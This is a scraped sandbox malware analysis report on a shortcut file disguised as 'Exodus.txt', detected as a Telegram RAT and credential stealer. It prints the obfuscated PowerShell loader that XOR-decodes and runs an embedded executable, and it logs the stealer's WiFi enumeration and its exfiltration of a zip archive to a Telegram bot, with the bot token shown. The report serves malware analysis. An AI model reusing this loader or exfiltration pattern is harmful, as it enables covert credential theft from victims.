Jan 11, 2025 08:42:04.376137018 CET	4944	OUT	Data Raw: 50 43 66 51 6f 4e 61 6e 48 6f 25 32 66 4d 52 7a 31 4b 58 42 45 72 6f 48 32 41 52 72 77 66 34 67 55 33 33 25 32 66 36 76 44 50 58 42 4b 74 74 32 76 6b 42 36 71 39 57 4f 74 55 38 25 32 66 6c 59 51 47 7a 53 70 43 4f 59 52 67 36 65 66 63 31 43 4c 48 Data Ascii: PCfQoNanHo%2fMRz1KXBEroH2ARrwf4gU33%2f6vDPXBKtt2vkB6q9WOtU8%2flYQGzSpCOYRg6efc1CLHBZaGBHsE5dDl7MgPBZOuWkMejLTsVE7HPFChUEYgmzN%2ftXWx73GEmGf4gDGRX7QIYgywyri5S24ys0GzQUa4GC594eLEckitzbAXDU%2bQnKUJ8RMyYAcyKW6gwz35pJYXovddezeE%2fAMK9CJ6PeE%2bOA82f
Jan 11, 2025 08:42:04.376176119 CET	4944	OUT	Data Raw: 31 6a 43 35 75 37 32 57 4c 4d 6f 63 38 41 74 48 65 25 32 66 63 25 32 66 45 72 33 56 38 6d 74 65 25 32 62 66 4f 70 4d 4d 71 79 69 64 4a 76 36 4f 53 4a 32 59 79 51 32 39 49 6e 4d 56 54 63 65 66 51 4b 68 53 45 6f 7a 4c 76 51 57 68 4c 62 71 57 47 71 Data Ascii: 1jC5u72WLMoc8AtHe%2fc%2fEr3V8mte%2bfOpMMqyidJv6OSJ2YyQ29InMVTcefQKhSEozLvQWhLbqWGqnkSWt%2bg31c87UxahpmWwVyq%2blPOxDRMTSf8z0eXkFajOnygg7WsOMdCYkBxHpp%2bBRd13UAF0AOJ6iup2V3XKrT1tbacD2tCAq0pD3GQ3quBn13nMruWaleCAm7naovtSCL2xII%2bekQVsQhjkOZV%2fn7H
Jan 11, 2025 08:42:04.933046103 CET	25	IN	HTTP/1.1 100 Continue
Jan 11, 2025 08:42:06.108081102 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:42:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:41:53 UTC	112	OUT	GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 Host: api.mylnikov.org Connection: Keep-Alive
2025-01-11 07:41:54 UTC	1003	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:41:54 GMT Content-Type: application/json; charset=utf8 Content-Length: 88 Connection: close Access-Control-Allow-Origin: * Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 48772 Last-Modified: Fri, 10 Jan 2025 18:09:02 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yudrr9jyGqK0HVq9Ir5Io7tRCOq0rpzJE4Nso6sWueW2sI12jGxvSt3c8v8B8GypEmpwCF%2BucgZi3HHm8d1sX99%2BnWh5NJqI0ODlFcSNsZsvuoYwKx2vEBiyS%2FCGuwfBzHkZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 9003445cadc1440d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2052&min_rtt=2050&rtt_var=774&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=726&delivery_rate=1409946&cwnd=178&unsent_bytes=0&cid=e5a35b111f15e72d&ts=191&x=0"
2025-01-11 07:41:54 UTC	88	IN	Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 33 36 35 33 32 35 34 32 7d Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1736532542}

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:42:02 UTC	278	OUT	POST /bot7033932802:AAGEIhL9e0lyUi0vjZnRy3PcwnKJPhSCFWQ/sendDocument?chat_id=1126217452 HTTP/1.1 Content-Type: multipart/form-data; boundary="5e6f3de5-9dbc-42c8-978a-01d8ad9e017a" Host: api.telegram.org Content-Length: 190055 Expect: 100-continue Connection: Keep-Alive
2025-01-11 07:42:02 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-11 07:42:02 UTC	40	OUT	Data Raw: 2d 2d 35 65 36 66 33 64 65 35 2d 39 64 62 63 2d 34 32 63 38 2d 39 37 38 61 2d 30 31 64 38 61 64 39 65 30 31 37 61 0d 0a Data Ascii: --5e6f3de5-9dbc-42c8-978a-01d8ad9e017a
2025-01-11 07:42:02 UTC	115	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 39 44 39 33 32 45 44 33 30 31 2e 7a 69 70 2e 62 69 6e 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 39 44 39 33 32 45 44 33 30 31 2e 7a 69 70 2e 62 69 6e 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=9D932ED301.zip.bin; filename*=utf-8''9D932ED301.zip.bin
2025-01-11 07:42:02 UTC	16355	OUT	Data Raw: 4b ae 49 92 bb fa ca 87 f4 d1 e1 e7 51 07 be b7 d9 35 06 5e 83 dd 59 87 80 9b e8 89 f2 41 47 01 c7 3f 48 60 16 06 8e 9e 23 1c e3 e9 0a 6c 8a fd ea af 6e cc e8 9b e7 35 41 79 33 11 7f bf 1d a4 4d dc a6 33 52 0d 45 e5 75 8a fa d1 0e 53 5a 6d 2a fd 61 92 5c 79 78 95 bd 46 a4 db 7a ff a8 e9 fa 67 53 e1 85 cc be 84 c7 54 df be 6b df e1 d1 90 7d 61 bb 67 ff 79 85 4b fd 80 a4 a5 aa 54 e3 92 cc 55 30 f1 10 a5 85 53 20 3c 63 3e 8b cb 4a 63 8a c8 99 0c e4 f3 9c 7b 26 6b 2b 32 dd db 87 63 1e 32 08 ca e3 c8 63 bb 77 72 40 f5 2b 8d a3 63 c1 5e 2d 26 fc cf a4 15 15 cc 26 13 fb 1a 9a 35 7c 66 25 37 25 ce ba 5f 2e 52 2b 21 d5 22 f0 60 d5 8a b7 27 20 fc f0 85 09 7f b9 25 f5 64 3a fb 84 f3 c7 af cb 92 44 b8 79 ca 10 c6 b7 42 73 e3 ce ff fe 53 95 9e 0a 62 22 bc cc e0 5f 2f Data Ascii: KIQ5^YAG?H`#ln5Ay3M3REuSZm*a\yxFzgSTk}agyKTU0S <c>Jc{&k+2c2cwr@+c^-&&5\|f%7%_.R+!"`' %d:DyBsSb"_/
2025-01-11 07:42:02 UTC	16355	OUT	Data Raw: 29 46 3c 53 c7 37 93 3b 9b 9e e8 f6 bd 57 1e bc 9b ec a7 2d 25 ff 24 18 43 7d b4 a3 7a 22 42 72 82 3b 3c 5a 94 7f 56 22 35 5a ea dc b1 01 9a 67 16 c9 af 48 3d ad 85 77 92 e1 6f f8 dd 0a 8b 90 e6 4a 5d 73 78 9d 97 c6 8f 3d fd 04 3a 5e 15 b4 72 e3 79 fd 19 d9 d0 91 61 66 a3 ea 4e b4 f6 68 23 9f 68 40 c0 57 1d 25 f5 04 95 f8 05 5c a6 5e 5b 08 2d f4 17 af fa 89 65 62 85 81 8d a0 52 ae 0e 82 c3 9c 63 25 3a 45 60 e5 17 20 0f 23 1c 01 10 61 39 d4 53 33 19 3a a7 a6 67 aa 06 83 73 9e b3 dc 88 f0 66 e9 5b 95 54 12 46 37 3f bc bf bb a3 20 44 8a 19 5b fd 71 03 8e 8f 7f 4d 1e 9c c8 97 f4 38 63 55 22 a1 92 c4 a3 d5 fe 40 e3 fd e6 a8 f3 b8 88 cb ca 59 96 82 2e ef 6c 9f c9 88 25 26 2b 3b 0a ba e5 d7 13 53 43 56 0f dc 8a 52 e9 b1 f8 7f ed b1 ba dd 14 2e 6c 5b ea c1 2e 20 Data Ascii: )F<S7;W-%$C}z"Br;<ZV"5ZgH=woJ]sx=:^ryafNh#h@W%\^[-ebRc%:E` #a9S3:gsf[TF7? D[qM8cU"@Y.l%&+;SCVR.l[.
2025-01-11 07:42:02 UTC	16355	OUT	Data Raw: 5e ea ca 01 fd cb 37 80 a3 74 1d a7 00 a8 7e 55 7c 44 51 4e f2 29 ab e6 d6 9a 97 68 d7 29 99 43 d5 ae e7 a2 f9 a7 32 19 d1 ec 2a 61 a9 9b e4 78 93 c9 de 16 7e d4 2f ff 46 61 f0 a9 7f 56 1d 69 eb 86 04 68 20 95 aa f6 57 76 cc 31 9b e9 29 39 23 00 63 91 0b f8 21 bd 65 bb db 18 3b 7b c5 b7 4b e9 fe e7 f9 9f 88 73 11 89 c4 ce 37 38 db 16 9c 1a 54 a4 3a 2b 4d 15 95 88 bb b6 76 81 c8 16 fe 03 ce 3c 2e 5a df d8 7a 3b 3e 65 49 bc 87 17 51 2b 5e 88 d6 b6 cb 38 3f 73 a2 1f 59 6b 76 bf 42 e6 0e ca 37 23 e9 83 1f 45 46 17 3a a1 20 0e df b7 f6 f6 fb 9b 52 b4 4e ff 21 73 e5 69 b4 96 33 d7 2d b8 04 0f 0a 0e e2 35 a3 96 78 ea ee dd 15 f9 d3 be 29 69 e1 09 72 fd 8f f5 59 00 ea f2 d3 54 82 15 2d e4 57 14 ab ec b9 5e 46 70 4b f3 50 91 1b 6c ed 76 f0 65 8d c1 56 11 32 4f 25 Data Ascii: ^7t~U\|DQN)h)C2*ax~/FaVih Wv1)9#c!e;{Ks78T:+Mv<.Zz;>eIQ+^8?sYkvB7#EF: RN!si3-5x)irYT-W^FpKPlveV2O%
2025-01-11 07:42:02 UTC	16355	OUT	Data Raw: f8 53 e9 64 fc f6 1d af ab 51 29 03 3e e4 18 a1 d7 66 19 e8 78 b3 07 90 9a e0 8a 48 2f 9a 60 ce 08 35 39 61 8d 0d e4 f5 a7 fc 88 45 99 59 d8 75 12 04 22 9d c3 66 0e 42 b3 e3 42 e6 5e 7e 41 43 fe 7a 6b 04 97 e0 9c 25 48 e7 03 c4 77 ab 3b 90 18 94 12 51 6d a2 06 37 98 ce 1f 74 ec ac 98 42 9b f0 7c 76 af 8d ff 35 96 a6 4a fd a1 d9 a2 28 c2 df 48 e4 9e 2b d8 b3 5e 2b 35 4c 87 33 f8 b3 ca ef 2f 66 1c 0e 3b 00 cf 25 49 ad cc e2 fa bf ae 58 f9 d7 a5 36 37 1d 4e 59 6f 85 dd 41 50 25 20 18 d3 68 f6 71 e2 5f 9a 8c 10 c1 44 b6 99 cc 8c f1 70 55 89 49 7b ef 15 f3 ec 3d c6 2f 65 f0 60 0a 88 da c0 b1 86 63 1d 4d 9c 66 a8 08 2b a3 7b 68 91 1d ba 65 91 25 8b ef cb 58 d4 a1 97 bf af 19 09 56 fa c5 af b8 50 3d a8 92 4d 03 a6 aa 03 53 28 b4 2e 92 6f d7 f1 93 c3 2c 1a a6 4b Data Ascii: SdQ)>fxH/`59aEYu"fBB^~ACzk%Hw;Qm7tB\|v5J(H+^+5L3/f;%IX67NYoAP% hq_DpUI{=/e`cMf+{he%XVP=MS(.o,K
2025-01-11 07:42:02 UTC	16355	OUT	Data Raw: c1 c3 e4 0f 24 8d 40 9f 83 69 84 f6 33 86 f5 aa 0a 8c 28 80 08 81 46 ac b2 95 c3 b7 20 cd 24 d9 64 37 7d b7 c6 94 be 1e 7c 73 71 e4 08 42 f0 f7 2a 2f 49 b1 6c 23 45 f8 79 9d ab 4e 07 35 7f 4a 4c 14 ec ac 92 09 0e c7 62 1b 7b f2 19 27 e3 40 a3 0b e2 bc a1 fb d0 fd 30 3b 6a 38 08 f1 cb 1d 0d 00 de c8 81 01 7e 34 70 b6 ef fb a6 6f f5 55 83 6d e7 ab 57 96 d4 ff fd ce 60 d6 a2 e7 c4 58 58 5a b0 59 b5 4d ad 89 1d 96 33 f9 50 91 bc 08 f8 eb 8a a3 50 40 48 00 fa e2 c8 11 03 5f 63 55 f9 e6 86 1b db 0a ab 93 a8 4a 03 9a d1 45 46 0b 25 68 40 4b cd 98 60 b9 ed a7 87 fb 9b 83 9d e9 3d 84 2f 4c a6 79 21 a3 03 e7 c3 b2 f1 8a 31 63 28 08 71 18 54 27 2f a5 03 bb e3 3f 3d ec 26 da f4 f1 fa 25 51 33 40 cc 51 7e 41 d4 33 f7 88 39 90 0c 67 15 6f 69 ce 79 5a 7e 41 82 c0 6a 04 Data Ascii: $@i3(F $d7}\|sqB*/Il#EyN5JLb{'@0;j8~4poUmW`XXZYM3PP@H_cUJEF%h@K`=/Ly!1c(qT'/?=&%Q3@Q~A39goiyZ~Aj
2025-01-11 07:42:02 UTC	16355	OUT	Data Raw: 85 cf 06 88 a8 79 70 c7 c0 97 dd 39 8f b1 28 f9 c4 99 8a d5 29 40 66 49 0e 81 83 8c d3 a6 00 7b a9 23 23 52 90 b0 20 9d 2f fa af e3 9e 86 a1 45 c0 fa 2b 5f 0e 98 25 ae a1 d4 7c ea fc e5 d3 8d 17 5f 39 8e 0e 1a 04 b7 19 15 2f 89 37 35 fd 47 3e 76 bf 02 b4 f1 a2 7c eb c4 d3 a3 36 98 84 1f 22 71 fc 21 5c 8c 2b 46 65 ea 4d f6 50 0a c9 8e 95 b5 2d c5 f6 29 5e 3f 9f c4 56 4d d7 72 ac ee 06 c4 af c1 52 05 ac 26 46 5e eb 16 e3 3b e2 6d be 1f e9 c3 31 e0 72 0d 58 24 9b d1 30 05 33 74 d7 b4 a0 8e c5 d0 84 0e 2b be 5d e3 eb 21 15 b3 ba 6d 19 a2 71 9a 91 d0 95 2a a9 bd 5b dd d5 2a 4d 32 11 53 e6 58 1b 51 a6 66 60 c7 2f 8e e1 f5 9f 8a 7c 5b 79 be 44 1a dc f5 18 96 34 ea 4c 9c d7 bb b2 ca 97 a1 0f d2 1a e4 c8 d7 f6 5a 05 43 47 8a cf 04 7f c7 e5 bd 07 df 28 ac eb 7d c3 Data Ascii: yp9()@fI{##R /E+_%\|_9/75G>v\|6"q!\+FeMP-)^?VMrR&F^;m1rX$03t+]!mq[M2SXQf`/\|[yD4LZCG(}
2025-01-11 07:42:02 UTC	16355	OUT	Data Raw: cb 94 ca 40 d0 0a a5 37 57 c3 52 51 92 fb 2d d9 27 6d ac 06 56 7c 1f 6d c6 db a7 bc 36 4c 95 50 f1 04 47 48 8b 19 ae e2 e1 01 3f 51 0a 33 16 fc c2 22 c8 4e e0 8e da 41 5c 29 71 b3 ca 3c 09 8e 65 88 8b 87 bb cf b3 fe 92 2c 55 0e 45 50 e2 0f ec c1 35 c2 4c d6 86 b1 f4 2f fd d0 53 26 a2 6f 71 7e dd 47 b0 b0 34 9b 92 6a 2e 68 36 1a db 98 30 8b 43 35 ae 00 eb 19 7f c0 4c 62 7e 4d 8b 97 f4 a0 c8 44 6f 98 55 54 e1 0e c7 26 2e b4 e6 02 e3 11 61 d5 7b 50 4c 4c 6c ae 72 a8 45 59 2c b4 bb 15 cd f2 a0 38 91 fd 3d 15 89 b6 b0 f6 07 b9 94 87 c8 e5 91 3c ee 2a 6e 94 6b 28 7e 89 b9 63 fe 46 b3 54 5a 80 75 00 4b 92 04 40 cb dd a9 aa 02 dd a9 53 96 0c c0 04 cb fb 35 02 b4 d2 d3 15 28 63 ef 1c 6b 68 6b 44 19 88 4e 24 cb 9e 9c 5c 62 fe b4 f6 87 72 25 1c 9e c6 f1 52 09 22 d2 Data Ascii: @7WRQ-'mV\|m6LPGH?Q3"NA\)q<e,UEP5L/S&oq~G4j.h60C5Lb~MDoUT&.a{PLLlrEY,8=<*nk(~cFTZuK@S5(ckhkDN$\br%R"
2025-01-11 07:42:02 UTC	16355	OUT	Data Raw: 2c 3e 64 d4 d9 ba 24 96 2b 4e 80 e0 4e 7b 86 3e 7f af ba b0 d2 1c e8 e0 29 59 4d 65 f5 5a 4a 2b 33 ed a5 33 d1 97 e6 88 5d f9 a3 2d ac 40 95 1d 74 ff 78 dc cb ae 51 4d 54 77 50 aa 26 0a be 66 b5 a1 c2 39 6b ba 35 1a b1 a2 3a 97 5c 3c e4 2c 21 6f fb e9 d0 7c 7f d4 07 bf 1f 74 cf 94 be 52 8d 9c 49 29 f2 ef 42 1a fe 35 6b 5d 1c b5 3e 36 b8 94 9d 80 88 89 6b d5 fc b9 11 3f ad 92 3f 2d 6c eb e6 7a 9d b5 f4 fd 94 ac 81 c5 cd 69 ed 2e 66 5e 2f 8d 68 94 c7 4e 00 a1 ac 74 92 47 0c 8c dc 8e d5 99 c6 88 49 62 7f f4 22 a7 c6 2b d8 8f ca 04 09 3a 41 aa 8d e9 e5 02 cb e4 69 f9 25 e7 67 26 44 79 35 8b 71 1e ce 7f cd ac a3 c0 3e 3e 52 f7 dc 45 fc ff ee dc 17 2c d2 d5 21 0c 37 02 ef f4 45 9f dd d1 af a5 9d 78 68 90 fd 8e 65 db 9e aa 67 d8 13 07 a4 66 4c cc 2f 64 48 eb e2 Data Ascii: ,>d$+NN{>)YMeZJ+33]-@txQMTwP&f9k5:\<,!o\|tRI)B5k]>6k??-lzi.f^/hNtGIb"+:Ai%g&Dy5q>>RE,!7ExhegfL/dH
2025-01-11 07:42:03 UTC	861	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 07:42:03 GMT Content-Type: application/json Content-Length: 473 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":674,"from":{"id":7033932802,"is_bot":true,"first_name":"d00mer","username":"d00m3rz_bot"},"chat":{"id":1126217452,"first_name":"N3cro","last_name":"M4ncer","username":"N3croM4nc","type":"private"},"date":1736581323,"document":{"file_name":"9D932ED301.zip.bin","mime_type":"application/octet-stream","file_id":"BQACAgQAAxkDAAIComeCIMuiQSd-O__DuIvRQmjt_ct8AAJtFgACamcQUCHX_cggrqtVNgQ","file_unique_id":"AgADbRYAAmpnEFA","file_size":189856}}}

Target ID:	0
Start time:	02:41:38
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden $lnkpath = Get-ChildItem *.lnk ^\| where-object {$_.length -eq 0x00012126} ^\| Select-Object -ExpandProperty Name; $file = gc $lnkpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x77 }; $path = 'C:\Users\user\AppData\Local\Temp\tmp' + (Get-Random) + '.exe'; sc $path ([byte[]]($file ^\| select -Skip 002838)) -Encoding Byte; ^& $path;
Imagebase:	0x7ff624c20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	02:41:39
Start date:	11/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -windowstyle hidden $lnkpath = Get-ChildItem *.lnk \| where-object {$_.length -eq 0x00012126} \| Select-Object -ExpandProperty Name; $file = gc $lnkpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x77 }; $path = 'C:\Users\user\AppData\Local\Temp\tmp' + (Get-Random) + '.exe'; sc $path ([byte[]]($file \| select -Skip 002838)) -Encoding Byte; & $path;
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	02:41:42
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Local\Temp\tmp1201676045.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\tmp1201676045.exe"
Imagebase:	0x1f768b00000
File size:	71'184 bytes
MD5 hash:	A7D234000C0F4FDE1266602EEBC0FC1C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000004.00000002.2290707674.000001F700001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2290707674.000001F700001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2290707674.000001F700001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000004.00000002.2290707674.000001F700001000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	true

Target ID:	5
Start time:	02:41:45
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"schtasks.exe" /query /TN WinTask
Imagebase:	0x7ff7520b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	02:41:46
Start date:	11/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Temp\p.html
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	15
Start time:	02:41:51
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x7ff624c20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	18
Start time:	02:41:52
Start date:	11/01/2025
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff6e2cb0000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	20
Start time:	02:41:53
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Imagebase:	0x7ff624c20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	23
Start time:	02:41:54
Start date:	11/01/2025
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show networks mode=bssid
Imagebase:	0x7ff6e2cb0000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Exodus.txt.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Yara Signatures

Initial Sample

Memory Dumps

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\9D932ED301.zip

C:\Users\user\AppData\Local\9D932ED301.zip.bin

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\tmp1201676045.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2p1n3l5i.2j2.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5q3fqksc.hax.psm1

Windows Analysis Report
Exodus.txt.lnk

Target ID:	26
Start time:	02:42:02
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp73C0.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp73C0.tmp.bat
Imagebase:	0x7ff624c20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	31
Start time:	02:42:05
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"schtasks.exe" /query /TN WinTask
Imagebase:	0x7ff7520b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	33
Start time:	02:42:06
Start date:	11/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Temp\p.html
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	35
Start time:	02:42:07
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Execution Coverage:	13.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

